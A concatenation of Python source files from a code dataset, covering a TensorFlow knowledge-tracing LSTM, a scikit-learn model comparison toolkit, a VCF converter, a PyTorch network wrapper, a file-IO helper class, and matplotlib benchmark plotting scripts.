zipfile.ZipFile(zip_file_path, 'w', zipfile.ZIP_DEFLATED)\n zip_file.write(file_path, filename)\n zip_file.close()\n\n logging.debug('Done')\n\n\ndef get_last_checkpoint_name(checkpoint_path):\n \"\"\"Returns the last TensorFlow checkpoint name from a \"checkpoints\" directory.\n It's used to avoid a syncing of all saved checkpoints from S3.\n \"\"\"\n if not os.path.exists(checkpoint_path):\n return False\n else:\n with open(checkpoint_path, 'r') as (f):\n last_model_str = f.readline()\n return os.path.basename(last_model_str[24:-2])\n\n\ndef check_path(path):\n \"\"\"Creates a directory if it doesn't exist.\"\"\"\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise","sub_path":"pycfiles/cloud_translator-1.0-py3-none-any/utils.cpython-36.py","file_name":"utils.cpython-36.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557148467","text":"\"\"\"Definition of the DKT LSTM network\"\"\"\nimport numpy\nimport tensorflow as tf\n\nfrom quick_experiment.models import seq_lstm\n\n\nclass DktLSTMModel(seq_lstm.SeqLSTMModel):\n\n def _build_loss(self, logits):\n \"\"\"Calculates the avg binary cross entropy using the sigmoid function.\n\n Args:\n logits: Tensor - [batch_size, max_num_steps, classes_num]\n \"\"\"\n mask = tf.sequence_mask(self.lengths_placeholder, self.max_num_steps)\n # Labels can be 1 or -1, we will replace the -1 with p(1)=0.\n labels = tf.cast(self.labels_placeholder, logits.dtype)\n loss = tf.nn.sigmoid_cross_entropy_with_logits(\n logits=logits, labels=tf.clip_by_value(labels, 0, 1))\n # loss has shape [batch_size, max_num_steps, classes_num]\n # We set to 0 the losses of the predictions of exercises that are not\n # the next one.\n loss = tf.multiply(loss, tf.abs(labels))\n loss = tf.div(\n tf.reduce_sum(tf.boolean_mask(loss, mask)),\n tf.cast(tf.reduce_sum(self.lengths_placeholder), loss.dtype))\n\n if self.logs_dirname:\n tf.summary.scalar('train_loss', loss)\n\n return loss\n\n def _build_predictions(self, logits):\n \"\"\"Return a tensor with the predicted performance of next exercise.\n\n The prediction for each step is float with the probability of the\n next exercise being correct. To know the true next exercise we use\n the id of the exercise that is not 0 from self.labels_placeholder\n\n Args:\n logits: Logits tensor, float - [batch_size, max_num_steps,\n num_classes].\n\n Returns:\n A float64 tensor with the predictions, with shape [batch_size,\n max_num_steps].\n \"\"\"\n predictions = tf.nn.sigmoid(logits)\n # We leave only the predictions for the true next exercise.\n # We use the fact that labels_placeholder can be 1 or -1 for the next\n # exercise.\n predictions = tf.multiply(\n predictions,\n tf.cast(tf.abs(self.labels_placeholder), predictions.dtype))\n # We keep only the predictions that are not 0. Should be only one per\n # step because labels_placeholder is a one hot encoding.\n predictions = tf.reduce_max(predictions, axis=2)\n return predictions\n\n def _get_step_predictions(self, batch_prediction, batch_true, feed_dict):\n step_prediction = self.sess.run(self.predictions, feed_dict=feed_dict)\n labels = numpy.argmax(feed_dict[self.labels_placeholder], axis=-1)\n for index, length in enumerate(feed_dict[self.lengths_placeholder]):\n batch_prediction[index] = numpy.append(\n batch_prediction[index], step_prediction[index, :length])\n batch_true[index] = numpy.append(\n batch_true[index], labels[index, :length])\n\n def predict(self, partition_name, limit=-1):\n \"\"\"Applies the classifier to all elements in partition name.\n\n Returns:\n A tuple (true, predictions). true has the true labels of the\n predicted elements, predictions has the predicted labels of the\n elements. Each label is a the probability of the next exercise\n being correct.\n Both true and predictions are arrays (sequences) of length\n self.dataset.num_examples(partition_name). The elements of the list\n are the labels of the sequence represented as an array.\n \"\"\"\n predictions = []\n true = []\n old_start = self.dataset.reset_batch(partition_name)\n with self.graph.as_default():\n while (self.dataset.has_next_batch(self.batch_size, partition_name)\n and (limit <= 0 or len(predictions) < limit)):\n batch_prediction = [numpy.array([]) for\n _ in range(self.batch_size)]\n batch_true = [numpy.array([]) for _ in range(self.batch_size)]\n for feed_dict in self._fill_feed_dict(partition_name,\n reshuffle=False):\n self._get_step_predictions(batch_prediction, batch_true,\n feed_dict)\n predictions.extend(batch_prediction)\n true.extend(batch_true)\n self.dataset.reset_batch(partition_name, old_start)\n return numpy.array(true), numpy.array(predictions)\n\n def _build_evaluation(self, predictions):\n \"\"\"Evaluate the quality of the logits at predicting the label.\n\n Args:\n predictions: Predictions tensor, int - [current_batch_size,\n max_num_steps].\n Returns:\n A scalar float32 tensor with the mean squared error.\n \"\"\"\n # predictions has shape [batch_size, max_num_steps]\n with tf.name_scope('evaluation_performance'):\n mask = tf.sequence_mask(\n self.lengths_placeholder, maxlen=self.max_num_steps,\n dtype=predictions.dtype)\n # We use the mask to ignore predictions outside the sequence length.\n labels = tf.cast(tf.reduce_max(\n self.labels_placeholder, axis=2), predictions.dtype)\n\n mse, mse_update = tf.contrib.metrics.streaming_mean_squared_error(\n predictions, labels, weights=mask)\n\n if self.logs_dirname:\n tf.summary.scalar('eval_mse', mse)\n tf.summary.scalar('eval_up_mse', mse_update)\n\n return mse, mse_update\n\n def evaluate(self, partition='validation'):\n with self.graph.as_default():\n # Reset the metric variables\n stream_vars = [i for i in tf.local_variables()\n if i.name.split('/')[0] == 'evaluation_performance']\n mse, mse_update = self.evaluation_op\n self.dataset.reset_batch(partition)\n mse_value = None\n self.sess.run([tf.variables_initializer(stream_vars)])\n while self.dataset.has_next_batch(self.batch_size, partition):\n for feed_dict in self._fill_feed_dict(partition,\n reshuffle=False):\n feed_dict[self.dropout_placeholder] = 0\n self.sess.run([mse_update], feed_dict=feed_dict)\n mse_value = self.sess.run([mse])[0]\n\n return mse_value\n\n","sub_path":"models/dkt.py","file_name":"dkt.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332270293","text":"## Created by Paul de Fusco\n## Custom Visualization Methods\n\n#%load_ext autoreload\n\n#%autoreload 2\n\n#Utilities\nimport os\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#Models\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import ExtraTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n#Preprocessing\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, OrdinalEncoder, LabelEncoder, Binarizer, LabelBinarizer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, StratifiedKFold\n\n### Execute the workflow in the order as shown below ###\n\n#Create random nulls - optional\ndef create_nulls(df):\n\n y = pd.DataFrame(df.target)\n df.drop('target', axis=1, inplace=True)\n #Change the probabilities to obtain more or less nulls\n df_new = df.mask(np.random.choice([True, False], size=df.shape, p=[.01,.99]))\n df_new['target'] = y\n\n return df_new\n\n#Models to be evaluated - can be modified/overridden to include more\ndef models():\n models = {}\n models['log'] = (LogisticRegression(solver='lbfgs'), {'C':[0.01, 0.1, 1]})\n models['ridge'] = (RidgeClassifier(), {'alpha':[0.01, 0.1, 1]})\n models['svc'] = (SVC(), {'C':[0.1, 1], 'gamma':['auto']})\n models['gaus_nb'] = (GaussianNB(), {'var_smoothing':[1e-9, 1]})\n models['bagging_class'] = (BaggingClassifier(), {'n_estimators':[7,12], 'max_samples':[1,5]})\n models['rf_class'] = (RandomForestClassifier(), {'max_depth':[100, 1000], 'max_leaf_nodes':[10, 20, 30]})\n \n return models\n\n#Preprocessing pipeline - accounts only for numeric features and categorical one hot encodings\n#Can be augmented with label encoder, ordinal encoder, etc.\ndef processing_pipeline(numeric_features, categorical_features, bin_features, lab_bin_features, classifier):\n\n #numeric_features and categorical_features must be lists\n\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='mean')),\n ('scaler', StandardScaler())])\n\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n \n binary_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('binary', Binarizer())])\n \n label_binary_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('label_binary', OneHotEncoder(sparse=False))])\n\n preprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features),\n ('bin', binary_transformer, bin_features), \n ('lab_bin', label_binary_transformer, lab_bin_features) \n ], #setting remainder to passthrough so features that are not included are not dropped\n remainder='passthrough'\n \n )\n\n # Append classifier to preprocessing pipeline.\n # Now we have a full prediction pipeline.\n pipe = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', classifier)])\n\n return pipe\n\n#Split data between training and test sets\ndef split_data(df, target_name, test_size):\n\n X = df.drop(str(target_name), axis=1)\n y = df[str(target_name)]\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state = 1)\n\n return X_train, X_test, y_train, y_test\n\n#Evaluate classifiers:\ndef evaluate_classifier(X_train, X_test, y_train, y_test, pipe, classifier_paramgrid, metric):\n\n #NB: classifier_paramgrid should be a tuple with the classifier and its associated param grid for GridsearchCV\n\n classifier, param_grid = classifier_paramgrid[0], classifier_paramgrid[1]\n\n new_param_grid = {}\n for i,k in param_grid.items():\n j = 'clf__'+i\n new_param_grid[j] = k\n\n #Using stratified kfold to address imbalanced classes in target feature:\n cv = StratifiedKFold(n_splits=5, random_state=1)\n\n gs = GridSearchCV(estimator=pipe, param_grid=[new_param_grid], n_jobs=-1, cv=cv, scoring=metric)\n\n gs.fit(X_train, y_train)\n\n cv_metric = cross_val_score(gs, X_train, y_train, cv=cv)\n\n print(\"\\n---------\")\n print(\"Model Evaluated: \", classifier_paramgrid[0])\n print(\"Training {} Mean with CV: {}\".format(metric, cv_metric.mean()))\n print(\"Training {} Standard Dev with CV: {}\".format(metric, cv_metric.std()))\n print(\"Test Score: %.3f\" % gs.score(X_test, y_test))\n\n return cv_metric\n\n#Main function to execute the workflow\ndef execute_spotcheck(df, target_name, test_size, numeric_features, categorical_features, bin_features, lab_bin_features):\n\n #Split the data so to leave a final test set to avoid data leakage\n X_train, X_test, y_train, y_test = split_data(df, target_name, test_size)\n\n #Create a dictionary holding models that will be evaluated\n models_tested = models()\n\n model_results = {}\n\n for k, (model, params) in models_tested.items():\n #Create pipeline to apply the same transformations to each model evaluated\n pipe = processing_pipeline(numeric_features, categorical_features, bin_features, lab_bin_features, model)\n cv_metric = evaluate_classifier(X_train, X_test, y_train, y_test, pipe, (model, params), 'accuracy')\n model_results[k] = cv_metric\n\n return model_results, models_tested\n\n#Simple visualization of outcomes:\ndef visualize_results(model_results, models_tested):\n \n models_report = pd.DataFrame(model_results, columns=list(models_tested.keys()))\n \n fig, ax1 = plt.subplots(figsize=(len(models_report.columns)*3,4))\n sns.boxplot(data=models_report, ax=ax1)\n plt.suptitle('Model Evaluation Report')\n plt.show()\n\n \ndef test():\n print('this is a test')","sub_path":"machine_learning_projects/churn_prediction/lib/model_eval_toolkit.py","file_name":"model_eval_toolkit.py","file_ext":"py","file_size_in_byte":6675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278501992","text":"import sys,getopt\r\n\r\ndef main(argv):\r\n inputfile = \"\"\r\n outputfile = \"\"\r\n\r\n try:\r\n # 这里的 h 就表示该选项无参数,i:表示 i 选项后需要有参数\r\n opts, args = getopt.getopt(argv, \"hi:o:\", [\"infile=\", \"outfile=\"])\r\n except getopt.GetoptError:\r\n print('Error: test_arg.py -i -o ')\r\n print( ' or: test_arg.py --infile= --outfile=')\r\n sys.exit(2)\r\n\r\n for opt, arg in opts:\r\n if opt == \"-h\":\r\n print('test_arg.py -i -o ')\r\n print('or: test_arg.py --infile= --outfile=')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--infile\"):\r\n inputfile = arg\r\n elif opt in (\"-o\", \"--outfile\"):\r\n outputfile = arg\r\n\r\n\r\n\r\n with open(inputfile) as fp1:\r\n list1 = fp1.readlines()\r\n\r\n last_list = []\r\n for i in list1:\r\n if i[0] == \"#\":\r\n if i[1] == \"#\":\r\n continue\r\n else:\r\n # 输出行第一行的生成\r\n i = i.strip('\\n') # 去掉每行输入的最后的换行符\r\n str_split = i.split('\\t') # 把每行输入以空格切割开\r\n # print(str_split)\r\n str_split = str_split[9:] # 根据原vcf文件的格式,取第9个元素之后的内容\r\n # print(str_split)\r\n last_list_item = 'CHR:POS'+'\\t'+'CHR'+'\\t'+'GeneticPos'+'\\t'+'POS'+'\\t'+'REF'+'\\t'+'ALT'+'\\n'\r\n last_list.append(last_list_item)\r\n else:\r\n i = i.strip('\\n')\r\n str_split = i.split('\\t')\r\n last_list_item = str_split[2]+'\\t'+str_split[0]+'\\t'+'0'+'\\t'+str_split[1]+'\\t'+str_split[3]+'\\t'+str_split[4]+'\\n'\r\n\r\n # print(str_split)\r\n\r\n last_list.append(last_list_item)\r\n\r\n outputString = ''\r\n for eachone in last_list:\r\n outputString = outputString + eachone\r\n data = open(outputfile, 'w+')\r\n print(outputString, file=data)\r\n data.close()\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n# print(last_list)\r\n\r\n\r\n","sub_path":"python/vcf2format1/vcf2xpdr.py","file_name":"vcf2xpdr.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95178148","text":"import torch as tc\nimport torch.nn as nn\nimport torch.optim as optim\n\n\n\nclass Network(nn.Module):\n def __init__(self, net_plane: list,activate: str = \"Sigmoid\", reduction: str = \"mean\", optimizer_lr: float = 0.01):\n super(Network,self).__init__()\n self.criterion = nn.MSELoss(reduction=reduction)\n if activate == \"ReLU\":\n self.activate = nn.ReLU()\n elif activate == \"Sigmoid\":\n self.activate = nn.Sigmoid()\n elif activate == \"Tanh\":\n self.activate = nn.Tanh()\n elif activate == \"LeakyReLU\":\n self.activate = nn.LeakyReLU()\n elif activate == \"RReLU\":\n self.activate = self.activate = nn.RReLU()\n elif activate == \"Hardsigmoid\":\n self.activate = self.activate = nn.Hardsigmoid()\n elif activate == \"Hardtanh\":\n self.activate = self.activate = nn.Hardtanh()\n elif activate == \"Hardswish\":\n self.activate = self.activate = nn.Hardswish()\n elif activate == \"Softplus\":\n self.activate = self.activate = nn.Softplus()\n elif activate == \"Softshrink\":\n self.activate = self.activate = nn.Softplus()\n elif activate == \"Tanhshrink\":\n self.activate = self.activate = nn.Tanhshrink()\n elif activate == \"GELU\":\n self.activate = self.activate = nn.GELU()\n elif activate == \"CELU\":\n self.activate = self.activate = nn.CELU()\n elif activate == \"SELU\":\n self.activate = self.activate = nn.SELU()\n elif activate == \"ReLU6\":\n self.activate = self.activate = nn.ReLU6()\n elif activate == \"PReLU\":\n self.activate = self.activate = nn.PReLU()\n elif activate == \"LogSigmoid\":\n self.activate = self.activate = nn.LogSigmoid()\n elif activate == \"Softmax\":\n self.activate = self.activate = nn.Softmax()\n self.layers = nn.Sequential()\n plane_index = 0\n layer_index = 0\n for layer_ in range(len(net_plane)-1):\n self.layers.add_module(name=str(layer_index),module=nn.Linear(in_features=net_plane[plane_index],out_features=net_plane[plane_index+1]))\n plane_index += 1\n layer_index += 1\n self.layers.add_module(name=str(layer_index), module=self.activate)\n layer_index += 1\n\n\n \"\"\"Values from training\"\"\"\n self.loss = None\n self.output_from_net = None\n self.optimizer = optim.SGD(params=self.parameters(),lr=optimizer_lr)\n\n def forward(self, inputs):\n return self.layers(inputs)\n\n def training_net(self,inputs, must_outputs):\n self.optimizer.zero_grad()\n self.output_from_net = self.forward(inputs)\n self.loss = self.criterion(self.output_from_net, must_outputs)\n self.loss.backward()\n self.optimizer.step()\n return self.output_from_net\n def save(self, path):\n tc.save(self.layers,path)\n def load(self, path: str):\n self.layers = tc.load(path)\n\n\n\"\"\"from tqdm import tqdm\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch import tensor\nfrom torch import optim\n\nimport matplotlib.pyplot as plt\n\ntorch.manual_seed(0)\ndevice = 'cpu'\n\n# XOR gate inputs and outputs.\nX = xor_input = tensor([[0,0], [0,1], [1,0], [1,1]]).float().to(device)\nY = xor_output = tensor([[0],[1],[1],[0]]).float().to(device)\n\n\n# Use tensor.shape to get the shape of the matrix/tensor.\nnum_data, input_dim = X.shape\nprint('Inputs Dim:', input_dim) # i.e. n=2 \n\nnum_data, output_dim = Y.shape\nprint('Output Dim:', output_dim) \nprint('No. of Data:', num_data) # i.e. n=4\n\n# Step 1: Initialization. \n\n# Initialize the model.\n# Set the hidden dimension size.\nhidden_dim = 5\n# Use Sequential to define a simple feed-forward network.\nmodel = nn.Sequential(\n # Use nn.Linear to get our simple perceptron.\n nn.Linear(input_dim, hidden_dim),\n # Use nn.Sigmoid to get our sigmoid non-linearity.\n nn.Sigmoid(),\n # Second layer neurons.\n nn.Linear(hidden_dim, output_dim),\n nn.Sigmoid()\n )\nmodel\n\n# Initialize the optimizer\nlearning_rate = 0.3\noptimizer = optim.SGD(model.parameters(), lr=learning_rate)\n\n# Initialize the loss function.\ncriterion = nn.MSELoss()\n\n# Initialize the stopping criteria\n# For simplicity, just stop training after certain no. of epochs.\nnum_epochs = 5000 \n\nlosses = [] # Keeps track of the loses.\n\n# Step 2-4 of training routine.\n\nfor _e in tqdm(range(num_epochs)):\n # Reset the gradient after every epoch. \n optimizer.zero_grad() \n # Step 2: Foward Propagation\n predictions = model(X)\n\n # Step 3: Back Propagation \n # Calculate the cost between the predictions and the truth.\n loss = criterion(predictions, Y)\n # Remember to back propagate the loss you've computed above.\n loss.backward()\n\n # Step 4: Optimizer take a step and update the weights.\n optimizer.step()\n\n # Log the loss value as we proceed through the epochs.\n losses.append(loss.data.item())\n\n\nplt.plot(losses)\nplt.show()\"\"\"","sub_path":"work/0.0.2/Network/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"21642100","text":"import os\nfrom os.path import join as pjoin\nfrom os.path import isdir\n\n\n\nclass IO:\n \"\"\"Class to perform Input/Output opreations.\n\n Provides methods to perform various IO operations\n in the target directory.\n\n Attributes\n ----------\n path: str\n Path to the target directory\n mode: str\n Mode of operations, valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n \"\"\"\n\n def __init__(self, path=os.getcwd(), mode=\"a\", ignore_dirs=[]):\n \"\"\"Initialize the IO class.\n\n Parameters\n ----------\n path: str, optional\n Path to perform operations on\n mode: str, optional\n Mode of operations, valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n ignore_dirs: list\n List of directories to ignore\n \"\"\"\n self._path = str()\n self._mode = str()\n self.ignore_dirs = ignore_dirs\n self.files = []\n self.sub_dirs = []\n\n self.path = path\n self.mode = mode\n\n if not isdir(self.path):\n raise IOError(\n f'{self.path} is not a valid directory'\n )\n\n if self.mode not in ['a', 'm', 's']:\n raise ValueError(\n f'{self.mode} is not a valid IO operation mode'\n )\n\n self.setup()\n\n def setup(self):\n \"\"\"Setup the IO class\n \"\"\"\n self.mode_mappings = {'a': [*'rwxa', 'wb+', 'w+', 'rb+'],\n 'm': [*'rwa', 'wb', 'rb'],\n 's': [*'ra', 'rb']}\n\n self.update_paths(self._path)\n\n def update_paths(self, path):\n \"\"\"Update the paths of files, sub_dirs w.r.t the path.\n\n Parameters\n ----------\n path: str\n Path to the target directory\n \"\"\"\n self.files.clear()\n self.sub_dirs.clear()\n\n for path, subdirs, files in os.walk(path):\n if all(dir not in path for dir in self.ignore_dirs):\n\n for file, dir in zip(files, subdirs):\n self.files.append(pjoin(path, file))\n self.sub_dirs.append(pjoin(path, dir))\n\n def read(self, file, mode='r'):\n \"\"\"Read the content of a file\n\n Parameters\n ----------\n file: str\n Name of the file\n mode: str, optional\n Mode of operation\n \"\"\"\n if mode not in self.mode_mappings[self.mode]:\n raise IOError(\n f'Mode {mode} not allowed with IO mode {self.mode}'\n )\n\n with open(file, mode) as f:\n content = f.read()\n\n return content\n\n def write(self, file, mode, content):\n \"\"\"Write some content into a file.\n\n Parameters\n ----------\n file: str\n Name of the file\n mode: str\n Mode of operation\n content: str\n Content to write in the file\n \"\"\"\n if mode not in self.mode_mappings[self.mode]:\n raise IOError(\n f'Mode {mode} not allowed with IO mode {self.mode}'\n )\n\n with open(file, mode) as f:\n f.write(content)\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, path):\n \"\"\"Set the value of the current path.\n\n Parameters\n ----------\n path: str\n New path\n \"\"\"\n self._path = path\n self.update_paths(self._path)\n\n @property\n def mode(self):\n return self._mode\n\n @mode.setter\n def mode(self, mode):\n \"\"\"Set the value of the IO mode.\n\n Parameters\n ----------\n mode: str\n Mode of operations, valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n \"\"\"\n self._mode = mode\n\n if self._mode not in [*'ams']:\n raise ValueError(\n f'{self._mode} is not a valid IO operation mode'\n )\n\n @property\n def mode_mapping(self):\n return self.mode_mappings\n\n @mode_mapping.setter\n def mode_mapping(self, io_mode):\n \"\"\"Add a IO permission to a specific mode\n\n Parameters\n ----------\n io_mode: Iterable\n Iterable that packs the mode, IO permission\n Valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n \"\"\"\n if len(io_mode) != 2:\n raise ValueError(\n f'Iterable {io_mode} can have max two values packed'\n )\n\n mode, io_permission = io_mode\n self.mode_mappings[mode].append(io_permission)\n","sub_path":"checkpoint/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"760741","text":"import statistics\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport pandas as pd\nimport os\nfrom matplotlib.patches import Patch\n\ndef fileToObject(filename):\n currentObject = {}\n for line in open(filename, \"r\"):\n splittedLine = line.split(' ')\n\n if not splittedLine[0] in currentObject:\n currentObject[splittedLine[0]] = []\n\n currentObject[splittedLine[0]].append(int(splittedLine[2]))\n\n return currentObject\n\ndef checkresults(results):\n valid_result_counter = 0\n invalid_result_counter = 0\n for xid in results:\n if len(results[xid]) == 2: valid_result_counter += 1\n else: invalid_result_counter += 1\n\n print(str(valid_result_counter) + \" valid results\")\n print(str(invalid_result_counter) + \" invalid results\")\n\ndef get_results_for_file(filename):\n results = fileToObject(filename)\n xids = list(results.keys())\n del xids[:1000]\n checkresults(results)\n\n measured_delays = []\n for xid in xids:\n if len(results[xid]) == 2:\n measured_delays.append(abs(results[xid][0] - results[xid][1]))\n\n mean = statistics.mean(measured_delays)\n stdev = statistics.stdev(measured_delays)\n print(\"{} delays in file {}\".format(len(measured_delays), filename))\n print(\"mean: {} stdev: {}\".format(mean, stdev))\n\n return mean, stdev\n\ndef get_avg_from_cbench_result(filename):\n regex = \"^RESULT: \\d switches \\d+ tests min\\/max\\/avg\\/stdev = ([0-9\\.]*)\\/([0-9\\.]*)\\/([0-9\\.]*)\\/([0-9\\.]*) responses\\/s$\"\n\n with open(filename) as currentFile:\n lines = currentFile.read()\n match = re.search(regex, lines, re.MULTILINE)\n res = [float(match.group(1)), float(match.group(2)), float(match.group(3)), float(match.group(4))]\n if int(res[2]) == 0: print(\"result from \" + currentFileName + \" is 0!\")\n return int(res[2])\n\ndef get_pybench_result(filename):\n delays = []\n for line in open(filename, \"r\"):\n splitted = line.split(' ')\n delays.append(int(int(splitted[2])) - int(splitted[1]))\n\n mean = statistics.mean(delays)\n stdev = statistics.stdev(delays)\n print(\"{}: mean: {} stdev: {}\".format(filename, mean, stdev))\n return mean, stdev\n\ndef plot_bar_chart(data, stdev, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(4, 3))\n\n axes = plt.gca()\n axes.set_ylim([-250, 760])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Number of GCMI Apps')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n # Create bars\n plt.bar(y_pos, data, yerr=stdev, align='center', ecolor='black', capsize=6, width=0.5, hatch=\"//\", fill=False, edgecolor='black')\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n\n handles, labels = axes.get_legend_handles_labels()\n handles.append(plt.errorbar(0, -1000, yerr=10, ecolor=\"black\", fmt='none', elinewidth=1, capsize=4, capthick=1))\n labels.append(\"Standard Deviation\")\n\n legend = axes.legend()\n legend._legend_box = None\n legend._init_legend_box(handles, labels)\n legend._set_loc(legend._loc)\n legend.set_title(legend.get_title().get_text())\n\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_matching_messages(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(4, 3))\n\n axes = plt.gca()\n #axes.set_ylim([30, 250])\n axes.set_ylabel(r'Processing Time in $\\mu s$')\n axes.set_xlabel('Matching Messages')\n axes.yaxis.grid(True)\n\n line_names = [\"1\", \"2\", \"4\", \"8\", \"16\"]\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), line_names[0]: data[0], line_names[1]: data[1],\n line_names[2]: data[2], line_names[3]: data[3], line_names[4]: data[4]})\n\n # Create lines\n colors = ['darkgreen', 'blue', 'orange', 'purple', 'red']\n for i, line_name in reversed(list(enumerate(line_names))):\n plt.plot( 'x', line_name, data=df, marker='.', markerfacecolor=colors[i], markersize=6, color=colors[i], linewidth=1)\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.rcParams['legend.title_fontsize'] = '9'\n\n # Shrink current axis by 20%\n box = axes.get_position()\n axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # Put a legend to the right of the current axis\n axes.legend(title='Number of\\nGCMI Apps', loc='center left', bbox_to_anchor=(1, 0.5))\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_with_without_tls(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(4, 3))\n\n axes = plt.gca()\n axes.set_ylim([0, 175])\n axes.set_ylabel(r'processing time in $\\mu s$')\n axes.set_xlabel('number of apps')\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'with TLS': data[0], 'without TLS': data[1]})\n\n # Create lines\n plt.plot( 'x', 'with TLS', data=df, marker='.', markerfacecolor='black', markersize=5, color='blue', linewidth=1)\n plt.plot( 'x', 'without TLS', data=df, marker='.', markerfacecolor='black', markersize=5, color='darkgreen', linewidth=1)\n plt.legend()\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_filter_apps(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(3.5, 3.5))\n\n axes = plt.gca()\n #axes.set_ylim([0, 8000])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Number of Filters')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'Filters in one GCMI App': data[0], 'Filters in different\\nGCMI Apps': data[1]})\n\n # Create lines\n plt.plot( 'x', 'Filters in one GCMI App', data=df, marker='.', markerfacecolor='darkgreen', markersize=5, color='darkgreen', linewidth=1)\n plt.plot( 'x', 'Filters in different\\nGCMI Apps', data=df, marker='.', markerfacecolor='blue', markersize=5, color='blue', linewidth=1)\n plt.legend()\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_herter_vs_enhanced_bar(data, stdev):\n plt.clf()\n plt.figure(figsize=(5, 4))\n\n colors = [\"#3498db\", \"#95a5a6\", \"#2ecc71\"]\n bar_labels = ['Enhanced Framework\\nwith one Proxy', 'Enhanced Framework\\nwith multiple Proxies', 'Herter\\'s Framework']\n\n barWidth = 0.25\n barPositions = range(len(data[0]))\n\n for i, bars in enumerate(data):\n currentBarPositions = [x + i * barWidth for x in barPositions]\n plt.bar(currentBarPositions, bars, error_kw=dict(lw=1, capsize=4, capthick=1), width=barWidth, color=colors[i], yerr=stdev[i], label=bar_labels[i], ecolor=\"black\")\n\n axes = plt.gca()\n handles, labels = axes.get_legend_handles_labels()\n handles.append(plt.errorbar(0, -1000, yerr=10, ecolor=\"black\", fmt='none', elinewidth=1, capsize=4, capthick=1))\n labels.append(\"Standard Deviation\")\n\n legend = axes.legend()\n legend._legend_box = None\n legend._init_legend_box(handles, labels)\n legend._set_loc(legend._loc)\n legend.set_title(legend.get_title().get_text())\n\n plt.xticks([r + barWidth for r in range(len(data[0]))], [1, 2, 4, 8, 